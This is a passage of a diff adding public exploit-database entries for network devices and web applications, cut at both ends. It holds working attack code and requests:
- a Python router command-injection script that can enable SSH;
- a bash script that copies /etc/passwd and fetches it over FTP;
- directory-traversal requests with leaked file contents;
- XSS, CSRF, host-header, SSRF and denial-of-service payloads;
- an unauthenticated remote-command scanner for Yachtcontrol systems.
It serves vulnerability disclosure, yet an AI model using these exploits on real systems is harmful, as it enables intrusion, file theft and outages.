+# Vendor Homepage: https://www.fastweb.it/
+# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
+# Version: 0.00.81
+# Tested on: Linux
+# CVE : N/A
+
+import requests, json, time, sys
+
+current_milli_time = lambda: int(round(time.time() * 1000))
+
+password='XXXXXXXXXXXXXXX'
+
+if password == 'XXXXXXXXXXXXXXX':
+    print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
+    sys.exit(-1)
+
+#get XSRF-TOKEN
+headers = {
+    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
+    'Referer': 'http://192.168.1.254/tr069',
+}
+params = ()
+response = requests.get('http://192.168.1.254', headers=headers)
+
+#login request and get sessionKey
+xsrfToken=response.cookies['XSRF-TOKEN']
+cookies = {
+    'XSRF-TOKEN': xsrfToken,
+}
+headers = {
+    'Pragma': 'no-cache',
+    'X-XSRF-TOKEN': xsrfToken,
+    'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
+    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
+    'Accept': 'application/json, text/plain, */*',
+    'Referer': 'http://192.168.1.254/tr069',
+    'Accept-Encoding': 'gzip, deflate',
+    'Connection': 'keep-alive',
+    'Cache-Control': 'no-cache',
+}
+params = (
+    ('_', str(current_milli_time())),
+    ('cmd', '3'),
+    ('nvget', 'login_confirm'),
+    ('password', password),
+    ('remember_me', '1'),
+    ('sessionKey', 'NULL'),
+    ('username', 'admin'),
+)
+
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+
+jsonResponse = json.loads(response.text)
+sessionKey=jsonResponse["login_confirm"]["check_session"]
+
+print("Executing command reboot\n")
+
+#some commands as example are shown below in the mount parameter
+params = (
+    ('_', str(current_milli_time())),
+    ('act','nvset'),
+    ('service','usb_remove'),
+    #Code execution
+    #('mount','&ping -c 10 192.168.1.172&'),
+    #('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH
+    ('mount','&reboot&'),
+    ('sessionKey', sessionKey),
+)
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+print(response.text)
+
+#logout
+params = (
+    ('_', str(current_milli_time())),
+    ('cmd', '5'),
+    ('nvget', 'login_confirm'),
+    ('sessionKey', sessionKey),
+)
+
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+print(json.dumps(json.loads(response.text), indent=2))
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47663.txt b/exploits/hardware/webapps/47663.txt
new file mode 100644
index 000000000..1357237f3
--- /dev/null
+++ b/exploits/hardware/webapps/47663.txt
@@ -0,0 +1,142 @@
+# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
+# Google Dork: N/A​
+# Date: 2019​-11-15
+# Exploit Author: Kevin Randall​
+# Vendor Homepage: https://www.lexmark.com/en_us.html​
+# Software Link: https://www.lexmark.com/en_us.html​
+# Version: 2.27.4.0.39 (Latest Version)​
+# Tested on: Windows Server 2012​
+# CVE : CVE-2019-16758
+​
+​
+Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​
+​
+Timeline:​
+Discovered on: 9/24/2019​
+Vendor Notified: 9/24/2019​
+Vendor Confirmed Receipt of Vulnerability: 9/24/2019​
+Follow up with Vendor: 9/25/2019​
+Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019​
+Vendor Confirmed Vulnerability is Valid: 9/26/2019​
+Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019​
+Vendor Confirmed Signoff to Disclose: 9/27/2019​
+Final Email Sent: 9/27/2019​
+Public Disclosure: 11/15/2019​
+​
+PoC:​
+​
+GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1​
+TE: deflate,gzip;q=0.3​
+Connection: TE, close​
+Host: 10.200.15.70:2070​
+User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20​
+​
+HTTP/1.0 200 OK​
+Server: rXpress​
+Content-Length: 848536​
+​
+​
+.​
+.​
+.​
+.[.P.e.r.f.l.i.b.].​
+.​
+.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.​
+.​
+.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.​
+.​
+.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.​
+.​
+.​
+.​
+.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].​
+.​
+.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.​
+.​
+.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.​
+.​
+.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.​
+.​
+.L.a.s.t. .H.e.l.p.=.5.0.4.1.​
+.​
+.​
+.​
+.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].​
+.​
+.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.​
+​
+​
+GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1​
+TE: deflate,gzip;q=0.3​
+Connection: TE, close​
+Host: 10.200.15.70:2070​
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3​
+​
+HTTP/1.0 200 OK​
+Server: rXpress​
+Content-Length: 38710​
+​
+..[.S.t.r.i.n.g.s.].​
+.​
+.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".​
+.​
+.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".​
+.​
+.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".​
+.​
+.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".​
+.​
+.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".​
+.​
+.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".​
+.​
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".​
+.​
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
+.​
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".​
+.​
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
+.​
+.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".​
+​
+​
+​
+​
+GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1​
+TE: deflate,gzip;q=0.3​
+Connection: TE, close​
+Host: 10.200.15.70:2070​
+User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)​
+​
+HTTP/1.0 200 OK​
+Server: rXpress​
+Content-Length: 17463​
+​
+# Copyright (c) 1993-2004 Microsoft Corp.​
+#​
+# This file contains port numbers for well-known services defined by IANA​
+#​
+# Format:​
+#​
+# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]​
+#​
+​
+echo                7/tcp​
+echo                7/udp​
+discard             9/tcp    sink null​
+discard             9/udp    sink null​
+systat             11/tcp    users                  #Active users​
+systat             11/udp    users                  #Active users​
+daytime            13/tcp​
+daytime            13/udp​
+qotd               17/tcp    quote                  #Quote of the day​
+qotd               17/udp    quote                  #Quote of the day​
+chargen            19/tcp    ttytst source          #Character generator​
+chargen            19/udp    ttytst source          #Character generator​
+ftp-data           20/tcp                           #FTP, data​
+ftp                21/tcp                           #FTP. control​
+ssh                22/tcp                           #SSH Remote Login Protocol​
+telnet             23/tcp​
+smtp               25/tcp    mail                   #Simple Mail Transfer Protocol​
+time               37/tcp    timserver
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47669.sh b/exploits/hardware/webapps/47669.sh
new file mode 100755
index 000000000..ec4a7de3b
--- /dev/null
+++ b/exploits/hardware/webapps/47669.sh
@@ -0,0 +1,29 @@
+# Exploit Title: Centova Cast 3.2.11 - Arbitrary File Download
+# Date: 2019-11-17
+# Exploit Author: DroidU
+# Vendor Homepage: https://centova.com
+# Affected Version: <=v3.2.11
+# Tested on: Debian 9, CentOS 7
+
+#!/bin/bash
+if [ "$4" = "" ]
+then
+echo "Usage: $0 centovacast_url user password ftpaddress"
+exit
+fi
+url=$1
+user=$2
+pass=$3
+ftpaddress=$4
+
+dwn() {
+curl -s -k "$url/api.php?xm=server.copyfile&f=json&a\[username\]=$user&a\[password\]=$pass&a\[sourcefile\]=$1&a\[destfile\]=1.tmp"
+wget -q "ftp://$user:$pass@$ftpaddress/1.tmp" -O $2
+}
+
+dwn /etc/passwd passwd
+echo "
+
+/etc/passwd:
+"
+cat passwd
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47702.txt b/exploits/hardware/webapps/47702.txt
new file mode 100644
index 000000000..ec99cc448
--- /dev/null
+++ b/exploits/hardware/webapps/47702.txt
@@ -0,0 +1,145 @@
+# Exploit Title: TestLink 1.9.19 - Persistent Cross-Site Scripting
+# Date: 2019-11-20
+# Exploit Author: Milad Khoshdel
+# Software Link: http://testlink.org/
+# Version: TestLink 1.9.19
+# Tested on: Linux Apache/2 PHP/7.3.11
+
+
+=========
+Vulnerable Pages:
+=========
+
+Persistent --> https://[TestLink-URL]/testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=%3cscRipt%3ealert(0x008B19)%3c%2fscRipt%3e&id=4&show_mode=show&version_id=3
+Non-Persistent --> https://[TestLink-URL]/testlink/index.php?caller=login&reqURI=javascript%3aalert(0x002082)&viewer=3
+Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&nsextt=%3cscRipt%3ealert(0x00A5CA)%3c%2fscRipt%3e&show_mode=editDisabled&step_id=
+Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&%3cscRipt%3ealert(0x00A5CE)%3c%2fscRipt%3e=nsextt&show_mode=editDisabled
+Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&show_mode=%3cscRipt%3ealert(0x00A54D)%3c%2fscRipt%3e&step_id=
+
+
+=========
+POC:
+=========
+
+REGUEST -->
+
+GET /testlink/index.php?caller=login&reqURI=javascript%3aalert(0x002082)&viewer=3 HTTP/1.1
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Connection: Keep-Alive
+Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TL_lastTestProjectForUserID_2=1; TESTLINK197TL_lastTestPlanForUserID_1=2; TESTLINK197TL_user2_proj1_testPlanId=2; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd
+Referer: http://127.0.0.1/testlink/login.php?viewer=3
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+
+
+RESPONSE -->
+
+HTTP/1.1 200 OK
+Server: Apache
+Content-Length: 526
+X-Powered-By: PHP/7.3.11
+Pragma: no-cache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Keep-Alive: timeout=5, max=50
+X-Frame-Options: SAMEORIGIN
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Content-Encoding: 
+Date: Wed, 20 Nov 2019 11:29:45 GMT
+Vary: Cookie,Accept-Encoding
+Cache-Control: no-store, no-cache, must-revalidate
+
+<!DOCTYPE html>
+
+<head>
+ <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+ <meta http-equiv="Content-language" content="en" />
+ <meta name="generator" content="testlink" />
+ <meta name="author" content="TestLink Development Team" />
+ <meta name="copyright" content="TestLink Development Team" />
+ <meta name="robots" content="NOFOLLOW" />
+ <title>TestLink 1.9.19</title>
+ <meta name="description" content="TestLink - TestLink ::: Main Page" />
+ <link rel="icon" href="http://127.0.0.1/testlink/gui/themes/default/images/favicon.ico" type="image/x-icon" />
+</head>
+
+
+<frameset rows="70,*" frameborder="0" framespacing="0">
+ <frame src="lib/general/navBar.php?tproject_id=0&tplan_id=0&updateMainPage=1" name="titlebar" scrolling="no" noresize="noresize" />
+ <frame src="javascript:alert(0x002082)" scrolling='auto' name='mainframe' />
+ <noframes>
+  <body>
+   TestLink required a frames supporting browser.
+  </body>
+ </noframes>
+</frameset>
+
+
+-------------------------------------------------
+
+STEP 1 -->
+
+[Request]
+GET /testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=%3cscRipt%3ealert(0x008B19)%3c%2fscRipt%3e&id=4&show_mode=show&version_id=3 HTTP/1.1
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Connection: Keep-Alive
+Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TESTLINK197ys-tproject_1_ext-comp-1001=a%3As%253A%2F1%2F3; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd; TESTLINK197TL_user2_proj1_testPlanId=2; TESTLINK197TL_lastTestPlanForUserID_1=2; TL_lastTestProjectForUserID_2=1
+Referer: http://127.0.0.1/testlink/lib/testcases/tcEdit.php
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+
+
+[Response]
+HTTP/1.1 200 OK
+Server: Apache
+Content-Length: 0
+X-Powered-By: PHP/7.3.11
+Pragma: no-cache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Keep-Alive: timeout=5, max=47
+X-Frame-Options: SAMEORIGIN
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Date: Wed, 20 Nov 2019 11:59:45 GMT
+Vary: Cookie
+Cache-Control: no-store, no-cache, must-revalidate
+
+STEP 2 -->
+
+[Request]
+GET /testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=testcase&id=127.0.0.1/trace.axd&show_mode=show&version_id=3 HTTP/1.1
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Connection: Keep-Alive
+Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TESTLINK197ys-tproject_1_ext-comp-1001=a%3As%253A%2F1%2F3; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd; TESTLINK197TL_user2_proj1_testPlanId=2; TL_lastTestProjectForUserID_2=1; TESTLINK197TL_lastTestPlanForUserID_1=2
+Referer: http://127.0.0.1/testlink/lib/testcases/tcEdit.php
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+
+
+[Response]
+#Identification Page
+HTTP/1.1 200 OK
+Transfer-Encoding: chunked
+Server: Apache
+X-Powered-By: PHP/7.3.11
+Pragma: no-cache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Keep-Alive: timeout=5, max=98
+X-Frame-Options: SAMEORIGIN
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Content-Encoding: 
+Date: Wed, 20 Nov 2019 12:02:38 GMT
+Vary: Cookie,Accept-Encoding
+Cache-Control: no-store, no-cache, must-revalidate
+
+ner_title_{php}Smarty_Resource::parseResourceName(system("ns,[container_title_<scRipt>alert(0x008B19)</scRipt>] => container_title_<scRipt>alert(0x008B19)</scRipt>,[container_title_{{_self.env.registerUndefinedFilterCallback("sys
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47704.txt b/exploits/hardware/webapps/47704.txt
new file mode 100644
index 000000000..9d34a2840
--- /dev/null
+++ b/exploits/hardware/webapps/47704.txt
@@ -0,0 +1,47 @@
+# Exploit Title: Network Management Card 6.2.0 - Host Header Injection
+# Google Dork: 
+# Date: 2019-11-21
+# Exploit Author: Amal E Thamban,Kamal Paul
+# Vendor Homepage: https://www.apc.com/in/en/
+# Software Link: https://www.apc.com/shop/in/en/products/Network-Management-Card
+# Version: v6.2.0
+# Tested on: Kali Linux
+# CVE : 
+
+
+Description:Host Header Injection
+
+Product is vulnerable to host header injection because the host header can be changed to something outside the target domain (ie.evil.com) and cause it to redirect to to that domain instead. 
+-------------------------------------------------------------------------------------------------------------------------
+Orginal Request
+GET / HTTP/1.1
+Host: 192.168.10.211
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.10.211/logon.htm
+Connection: close
+Cookie: C0=apc
+Upgrade-Insecure-Requests: 1
+--------------------------------------------------------------------------------------------------------------------------
+Modifed request
+
+GET / HTTP/1.1
+Host: evil.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.10.211/logon.htm
+Connection: close
+Cookie: C0=apc
+Upgrade-Insecure-Requests: 
+---------------------------------------------------------------------------------------------------------------------------
+Response
+
+HTTP/1.1 303 See Other
+Location: http://evil.com/home.htm
+Content-Length: 0
+WebServer:
+Connection: close
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47738.txt b/exploits/hardware/webapps/47738.txt
new file mode 100644
index 000000000..b6bca6acb
--- /dev/null
+++ b/exploits/hardware/webapps/47738.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery 
+# Date: 2019-11-06
+# Exploit Author: Joas Antonio
+# Vendor Homepage: intelbras.com.br
+# Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200
+# Version: 1.1.3 (REQUIRED)
+# Tested on: Windows
+# CVE : CVE-2019-19516
+
+#POC1: 
+<html>
+	<body>
+		<form method="POST" action="http://IPROUTERRF1200/login/Auth">
+			<input type="hidden" name="username" value="admin"/>
+			<input type="hidden" name="password" value="21232f297a57a5a743894a0e4a801fc3"/> <!-- password admin -->
+			<input type="submit" value="Submit">
+		</form>
+	</body>
+<html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47744.txt b/exploits/hardware/webapps/47744.txt
new file mode 100644
index 000000000..aacbc3484
--- /dev/null
+++ b/exploits/hardware/webapps/47744.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2019-11-25
+# Exploit Author: SecuNinja
+# Vendor Homepage: cisco.com
+# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
+# Version: 8.4 to 8.9
+# Tested on: not applicable, works independent from OS
+# CVE : CVE-2019-15276
+
+# Exploit PoC:
+
+https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">
+
+# Firing this code will cause the system to reload which results in a DoS condition.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47760.py b/exploits/hardware/webapps/47760.py
new file mode 100755
index 000000000..62935992b
--- /dev/null
+++ b/exploits/hardware/webapps/47760.py
@@ -0,0 +1,94 @@
+# Exploit Title: Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2019-12-06
+# Exploit Author: Hodorsec
+# Vendor Homepage: http://www.yachtcontrol.nl/en/
+# Version: 1.0
+# Software Link: http://download.yachtcontrol.nl/klant/Software/ & http://download.yachtcontrol.nl/klant/Firmware/
+# Versions: Yachtcontrol webapplication through versions dated on 2019-10-06. No versioning system detected.
+# Tested on: Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
+# CVE: N/A
+# 
+# Description Product:
+# Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication, 
+# it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components. 
+# Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht.
+# Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices.
+#
+# Description Vulnerability: 
+# It's possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" 
+# page and parameter, where {COMMAND} will be executed and returning the results to the client. 
+# 
+# Affected Components:
+# Yachtcontrol webservers using the custom PHP webapplication, versions until 2019-10-06.
+
+#!/usr/bin/python
+import sys,os,requests
+
+# Check arguments
+if len(sys.argv) != 5:
+    print "Error: enter at least one IP/FQDN as argument. Exiting..."
+    print "\nUsage: " + sys.argv[0] + " {IP/FQDN} {PORT} {PROTO} {COMMAND}\n"
+    exit(0)
+
+# Parameters
+host = sys.argv[1]
+port = sys.argv[2]
+proto = sys.argv[3]
+command = sys.argv[4]
+timeout = 10
+isFile = False
+
+# Check for file or single IP/FQDN
+if os.path.isfile(host):
+    isFile = True
+    with open(host) as f:
+        targets = f.readlines()
+
+# Vulnerable page
+page = "/pages/systemcall.php?command="
+
+# HTTP or HTTPS
+if proto == "http":
+    proto = "http://"
+elif proto == "https":
+    proto = "https://"
+else:
+    print "\nInvalid method given: enter http or https\n"
+    exit(0)
+
+# Do the request
+if isFile:
+    for host in targets:
+        target = host.strip()
+        print target
+        try:
+            response = requests.get(proto + target + ":" + port + page + command, verify=False, timeout=timeout)
+            print(response.content.replace('executing command: ' + command,''))
+        except requests.exceptions.Timeout:
+            print "Timed out."
+            pass
+        except requests.exceptions.RequestException as e:
+            print "Host not found."
+            pass
+else:
+    try:
+        response = requests.get(proto + host + ":" + port + page + command, verify=False, timeout=timeout)
+        print(response.content.replace('executing command: ' + command,''))
+    except requests.exceptions.Timeout:
+        print "Timed out."
+        pass
+    except requests.exceptions.RequestException as e:
+        print "Host not found."
+        pass
+
+#  Disclosure Timeline using CERT/CC disclosure policy:
+#  - 06-10-19: Requested CVE
+#  - 06-10-19: Contacted vendor for initial contact, used several publicly known mailaddresses
+#  - 12-10-19: Sent reminder due to no response
+#  - 06-11-19: Sent second reminder due to no response
+#  - 08-11-19: Received response requesting information, sent information
+#  - 11-11-19: Correspondence concerning vulnerability
+#  - 25-11-19: Sent reminder of publishing PoC to vendor, received response
+#  - 05-12-19: Sent final reminder of publishing PoC to vendor
+#  - 06-12-19: Public Disclosure
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47764.txt b/exploits/hardware/webapps/47764.txt
new file mode 100644
index 000000000..6185243b3
--- /dev/null
+++ b/exploits/hardware/webapps/47764.txt
@@ -0,0 +1,72 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery
+# Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Version: 6.x
+# Advisory ID: ZSL-2019-5545
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF
+
+
+Vendor: INIM Electronics s.r.l.
+Product web page: https://www.inim.biz
+Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+Affected version: <=6.x
+Affected models: SmartLiving 505
+                 SmartLiving 515
+                 SmartLiving 1050, SmartLiving 1050/G3
+                 SmartLiving 10100L, SmartLiving10100L/G3
+
+Summary: SmartLiving anti-intrusion control panel and security system provides
+important features rarely found in residential, commercial or industrial application
+systems of its kind. This optimized-performance control panel provides first-rate
+features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+end-to-end voice transmission (voice-on-bus), IP connectivity.
+
+SMARTLAN/SI:
+The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+networking capability and fast connectivity to the Internet. Therefore, it is possible
+to set up a remote connection and program or control the system via the SmartLeague
+software application. In effect, the SmartLAN/SI board grants the same level of access
+to the system as a local RS232 connection.
+
+SMARTLAN/G:
+The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+advanced remote-access and communication functions. The SmartLAN/G board is capable of
+sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+an attachment and a text message. The attachment can be of any kind and is saved to an
+SD card. The message text can contain direct links to domains or IP addressable devices,
+such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+global access to their control panels via any Internet browser accessed through a PC,
+PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+distinguishing the means of connection and as a result provides an appropriate web-page
+for the tool in use. Smartphones can control the system in much the same way as a
+household keypad, from inside the house or from any part of the world.
+
+Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
+SmartLiving SmartLAN within the GetImage functionality. The application parses user
+supplied data in the GET parameter 'host' to construct an image request to the service
+through onvif.cgi. Since no validation is carried out on the parameter, an attacker
+can specify an external domain and force the application to make an HTTP request to
+an arbitrary destination host. This can be used by an external attacker for example
+to bypass firewalls and initiate a service and network enumeration on the internal
+network through the affected application.
+
+Tested on: GNU/Linux 3.2.1 armv5tejl
+           Boa/0.94.14rc21
+           BusyBox v1.20.2
+
+
+Vulnerability discovered by Sipke Mellema
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5545
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+
+PoC:
+
+curl http://192.168.1.17/cgi-bin/onvif.cgi -X POST -d"mod=GetImage&host=http://127.0.0.1:23&par=2"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47765.txt b/exploits/hardware/webapps/47765.txt
new file mode 100644
index 000000000..98b8401f4
--- /dev/null
+++ b/exploits/hardware/webapps/47765.txt
@@ -0,0 +1,192 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
+# Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Version: 6.x
+# Advisory ID: ZSL-2019-5545
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+#!/bin/bash
+#
+#
+# Inim Electronics SmartLiving SmartLAN/G/SI <=6.x Root Remote Command Execution
+#
+#
+# Vendor: INIM Electronics s.r.l.
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Affected version: <=6.x
+# Affected models: SmartLiving 505
+#                  SmartLiving 515
+#                  SmartLiving 1050, SmartLiving 1050/G3
+#                  SmartLiving 10100L, SmartLiving10100L/G3
+#
+# Summary: SmartLiving anti-intrusion control panel and security system provides
